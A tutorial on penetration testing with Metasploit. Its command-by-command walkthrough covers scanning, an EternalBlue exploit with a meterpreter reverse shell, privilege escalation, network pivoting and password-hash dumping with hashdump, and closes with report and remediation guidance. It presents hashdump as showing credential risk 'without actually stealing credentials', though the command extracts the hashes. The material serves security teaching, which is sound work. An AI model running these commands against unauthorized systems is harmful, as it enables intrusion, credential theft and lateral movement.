Conducting Penetration Tests with Metasploit: A Short Guide

Penetration testing allows organizations to identify vulnerabilities before malicious actors can exploit them. Among the many tools available to security professionals, Metasploit stands out as one of the most powerful frameworks. This guide walks through a penetration test using Metasploit, with a specific focus on identifying and exploiting vulnerable network services—one of the most common attack vectors in real-world scenarios.

Understanding the testing methodology

Professional penetration testing follows a structured methodology. For this guide, we'll focus on a service-based attack approach:

1. Reconnaissance: Gathering information about the target
2. Scanning and enumeration: Identifying live hosts and open services
3. Vulnerability identification: Finding potential security weaknesses
4. Exploitation: Attempting to compromise vulnerable services
5. Post-exploitation: Determining the impact of successful exploitation
6. Reporting: Documenting findings and recommendations

Setting up your testing environment

For this walkthrough, we'll assume you're using Kali Linux, which comes with Metasploit pre-installed. If you're using another distribution, install Metasploit from the official repository.

Start by ensuring the Metasploit database is properly configured:

# Initialize the Metasploit database
sudo msfdb init

# Start the PostgreSQL service if needed
sudo systemctl start postgresql

# Launch the Metasploit console
msfconsole

The Metasploit console (msfconsole) is your primary interface. You should see the distinctive Metasploit banner and the msf6 > prompt.

Phase 1: Reconnaissance and scanning

Before exploiting anything, it's necessary understanding the target environment. We'll use Metasploit's built-in scanning capabilities.

Port scanning:

# Use the TCP port scanner auxiliary module
msf6 > use auxiliary/scanner/portscan/tcp

# Set the target IP range (replace with your authorized target)
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-1000

# Configure threading for faster scanning
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 10

# Run the scan
msf6 auxiliary(scanner/portscan/tcp) > run

This scan identifies open ports on your target. Pay special attention to common service ports like 21 (FTP), 22 (SSH), 80 (HTTP), 139/445 (SMB), and 3389 (RDP).

Phase 2: Service enumeration

Once open ports are identified, determine what services are running and their versions. This information is crucial for identifying potential vulnerabilities.

Service version detection:

# SMB version detection
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/smb/smb_version) > run

# SSH version detection
msf6 > use auxiliary/scanner/ssh/ssh_version
msf6 auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/ssh/ssh_version) > run

# HTTP version detection
msf6 > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/http/http_version) > run

For more comprehensive service enumeration, integrate Nmap with Metasploit:

# Exit Metasploit temporarily
msf6 > exit

# Run Nmap with service version detection
nmap -sV -p- 192.168.1.100 -oX scan_results.xml

# Import results back into Metasploit
msfconsole
msf6 > db_import scan_results.xml
msf6 > hosts
msf6 > services

The db_import command brings your Nmap results into Metasploit's database, allowing you to reference discovered hosts and services throughout your engagement.

Phase 3: Vulnerability identification

With service information in hand, search for known vulnerabilities. Metasploit's search functionality is powerful and allows you to query by service, CVE number, or platform.

Searching for exploits:

# Search for exploits affecting a specific service
msf6 > search type:exploit platform:windows smb

# Search by CVE number
msf6 > search cve:2017-0144

# Search for auxiliary modules (scanners, fuzzers)
msf6 > search type:auxiliary smb

For this walkthrough, let's focus on testing an SMB service, as it's commonly misconfigured and has well-documented vulnerabilities.

SMB vulnerability scanning:

# Use the SMB version scanner
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/smb/smb_version) > run

# Check for EternalBlue vulnerability (MS17-010)
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.100
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

The MS17-010 scanner will indicate whether the target is vulnerable to EternalBlue, a significant SMB vulnerability discovered in 2017.

Phase 4: Exploitation

If the vulnerability scanner indicates the target is vulnerable, you can proceed with exploitation.

Configuring the exploit module:

# Load the EternalBlue exploit module
msf6 > use exploit/windows/smb/ms17_010_eternalblue

# View required options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

# Configure the target
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.100

# Select a payload (what runs after successful exploitation)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp

# Configure the payload to connect back to your machine
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.1.50
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444

# Verify all settings
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Understanding payloads: The payload is the code that executes on the target after successful exploitation. Common payload types include:

• Meterpreter: A powerful, feature-rich payload that provides interactive shell access and many post-exploitation tools
• Shell payloads: Simple command shells (cmd.exe or /bin/sh)
• Staged vs. non-staged: Staged payloads are sent in pieces (smaller initial footprint), while non-staged payloads are sent complete

Executing the exploit:

# Run the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

# Or use 'run' as an alias
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

If successful, you'll receive a Meterpreter session—an interactive post-exploitation framework that provides extensive control over the compromised system.

Phase 5: Impact assessment

The goal of ethical penetration testing isn't to cause damage—it's to demonstrate risk and determine the potential impact of a real attack. Post-exploitation activities should be carefully scoped and documented.

Basic Meterpreter commands:

# View system information
meterpreter > sysinfo

# Check your privilege level
meterpreter > getuid

# List running processes
meterpreter > ps

# Capture a screenshot (demonstrates access without exfiltration)
meterpreter > screenshot

# Check network configuration
meterpreter > ipconfig

Privilege escalation assessment:

Determine whether you can elevate privileges from a standard user to SYSTEM (Windows) or root (Linux):

# Attempt automatic privilege escalation
meterpreter > getsystem

# If successful, verify
meterpreter > getuid
# Should show NT AUTHORITY\SYSTEM

Lateral movement assessment:

Check whether the compromised system could be used as a pivot point to access other network resources:

# View network connections
meterpreter > netstat

# Add a route to scan internal networks through the compromised host
meterpreter > run autoroute -s 10.0.0.0/24

# Background the current session
meterpreter > background

# Run additional scans through the compromised host
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.0.1-254
msf6 auxiliary(scanner/portscan/tcp) > run

Credential harvesting assessment:

Demonstrate the risk of credential theft without actually stealing credentials:

# Access password hashes (requires SYSTEM privileges from earlier escalation)
meterpreter > hashdump

# Stop here

Phase 6: Documentation and reporting

Conclude the test and prepare findings. Thorough documentation ensures findings translate into actionable security improvements.

Exit:

# Exit the Meterpreter session
meterpreter > exit

# Review all sessions
msf6 > sessions -l

# Kill all sessions when testing is complete
msf6 > sessions -K

Essential documentation elements:

1. Executive Summary: High-level findings for non-technical stakeholders
2. Methodology: The approach and tools used
3. Findings: Each vulnerability discovered, including:

• Severity rating (Critical, High, Medium, Low)
• Affected systems and services
• Technical description
• Proof of concept (screenshots, command output)
• Business impact
• Remediation recommendations

4. Timeline: When each test was conducted
5. Scope: What was and wasn't tested

Sample finding structure:

Finding: Unpatched SMB Service Vulnerable to MS17-010

Severity: Critical

Affected Systems:
- 192.168.1.100 (Windows Server 2008 R2)

Description:
The SMB service on the target system is vulnerable to MS17-010 
(EternalBlue), allowing remote code execution without authentication.

Proof of Concept:
[Include sanitized command output and screenshots]

Impact:
An attacker could gain complete control of the system, access 
sensitive data, install malware, or use the system as a pivot 
point to attack other network resources.

Remediation:
1. Apply Microsoft Security Bulletin MS17-010 immediately
2. Disable SMBv1 protocol
3. Implement network segmentation
4. Enable host-based firewall rules to restrict SMB access

Conclusion

Metasploit's extensive module library, database integration, and post-exploitation capabilities make it an essential framework for security professionals. The service-based testing methodology demonstrated here—from reconnaissance through documentation—provides a structured approach to identifying vulnerabilities in network services. Properly applied, Metasploit's capabilities deliver the technical evidence organizations need to make informed security decisions.